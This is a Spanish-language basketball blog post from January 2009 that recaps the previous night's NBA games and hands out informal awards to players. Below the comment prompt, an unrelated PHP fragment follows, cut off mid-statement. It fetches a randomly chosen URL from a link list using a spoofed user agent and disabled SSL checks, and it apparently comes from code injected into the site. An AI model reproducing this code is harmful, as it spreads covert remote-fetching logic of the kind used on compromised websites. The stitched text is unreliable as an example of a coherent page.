La crónica (30/01/2009)

31 de January de 2009 por TheDeerHunter

Llegó el fin de semana y con él las maratonianas jornadas. La de anoche poco dada a sorpresas ni grandes emociones.

Los grandes favoritos al título ganaron cómodos. Lakers y Cavs a Timberwolves y Clippers respectivamente. Por su parte los Celtics, que a priori tenían un rival más complicado, dieron buena cuenta de los Pistons sin apenas despeinarse y alargan su nueva racha a 10 victorias. Eso sí, el de anoche fue un partido algo más normal para House, que venía el tipo como si estuviese poseído.

Entre los perseguidores sí se produjeron algunos tropezones importantes. Los Hornets mostraron la inconsistencia que les acompaña durante toda la temporada cayendo en casa contra los Warriors a pesar de la gran actuación de Chris Paul y de que Monta Ellis todavía no ha cogido la directa. Los Heat perdieron frente a unos Pacers que, con esta victoria, también se meten de lleno en la pomada. En esta ocasión  estuvieron liderados por un Dunleavy completísimo.

Por su parte, los Raptors dieron un paso atrás contra Milwaukee enuna discreta actuación de Calderón y un gran partido de Villanueva, que se ha erigido últimamente como el líder del equipo. Complicado lo tiene, eso sí, para defender la 8ª plaza.

Los Nuggets se zumbaron a los Bobcats en el regreso de Carmelo, los Hawks ganaron demasiado fácil a los Nets a pesar de no tener todavía a Horford y los Sixers, Jazz y Bulls hicieron lo propio con los colistas de la liga.

PREMIOS

MVP: Viernes con 11 partidos pero menos aspirantes de lo habitual. Charlie Villanueva con 26-13, Joe Johnson 29-4-5, Lebron 25-7-6, Bynum 27-15 y Deron Williams 24-12. Pero una dupla destacó por encima del resto:  Nene Hilario con 22 puntos, 12 rebotes, 3 asistencias, 2 robos con un 10 de 11 en tiros de campo y ganándole la batalla particular a Okafor, y Mike Dunleavy que lideró a los Pacers en su victoria sobre Miami con 30 puntos, 6 rebotes, 5 asistencias y 2 robos sin pérdidas de balon. Ambos se merecen nuestro MVP.

Rookie: Doble-doble de Michael Beasley en 23 minutos de juego, Eric Gordon con 27 puntos y 7 rebotes sigue siendo el mejor de los Clippers, Brook Lopez y Ryan Anderson sumaron 32 puntos y 10 rebotes entre ambos, Love 14-9 en 18 minutos, Westbrook con 20-8-4 y por último, 15 puntos con 12 rebotes (la mitad ofensivos) para Jason Thompson. Como veis fue una buena noche para los novatos con el punto negro de que todos perdieron sus partidos. Como somos unos tíos solidarios se lo damos compartido a Thompson y Love por quedarse fuera del All-Star.

La sorpresa: Podemos generalizarla en la victoria de los Warriors frente a los Hornets, pero hay actuaciones individuales que lo merecen más. Crittenton y McGuire fueron los escuderos de Butler&Jamison con 31 puntos, 9 rebotes y 10 asistencias entre ambos y Raja Bell, por su parte, fue el mejor de los Bobcats con 27-5-4. También contemplamos una nueva muestra de Novak de lo excelente tirador que es con 19 puntos y el buen partido de Ilgauskas con 20-11 volviendo de su lesión. Eso sí, para sorprendente Mark Blount y sus 17 puntos y 8 rebotes. Aún así no creemos que nadie vuelva a picar. Mención especial para el fallo de Jose Calderón en un tiro libre. Una lástima.

La decepción: Se lo llevan de calle los dos forwards de Detroit: Entre Prince y McDyess hicieron 7 puntos con 2 de 15 en tiros. Se quedan un tanto lejos los 4 puntos en 26 minutos de Josh Smith, los 5 puntos y 5 faltas en 16 minutos de Adam Morrison (todavía hay algunos que confían en él) y el 8 de 27 en tiros de West&Stojakovic.

Mayor esfuerzo en Vano: Aspirantes como Wade, los mencionados Raja Bell y Eric Gordon, Jamison, Chris Paul o Kevin Martin. Pero premio compartido (el tercero de la noche) para dos NO All-Star como Al Jefferson y Kevin Durant. El primero se las vio con Bynum y aún así se marcó 34 puntos, 13 rebotes y 4 tapones (para los que dicen que no defiende) y el segundo solo contó con la ayuda de Westbrook, lo cual unido a sus 29 puntos, 10 rebotes y 4 asistencias no sirvió ni de lejos para ganar a los Jazz.

Razones para trasnochar

Hay muchas razones, tantas como 10 partidos, pero nosotros elegimos el…

New Orleans vs San Antonio: Los Hornets llegan mermados por la baja de Chandler y con una irregularidad constante a lo largo de la temporada agravada por su derrota de hoy frente a los Warriors. Los Spurs, por su parte, llegan con todos los efectivos y tras una importante victoria  frente los Suns. Unos necesitan la victoria para reafirmarse y los otros no saben hacer otra cosa que pelear cada partido.

Esta noche estaremos atentos a… Greg Oden. Su polémica inclusión en el partido de los novatos y sus últimas buenas actuaciones se cruzan en el encuentro que esta noche disputan Blazers y Jazz. Tendrá que jugarse las castañas contra un tipo duro como Millsap y uno listo como Okur, en lo que será una buena piedra de toque.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>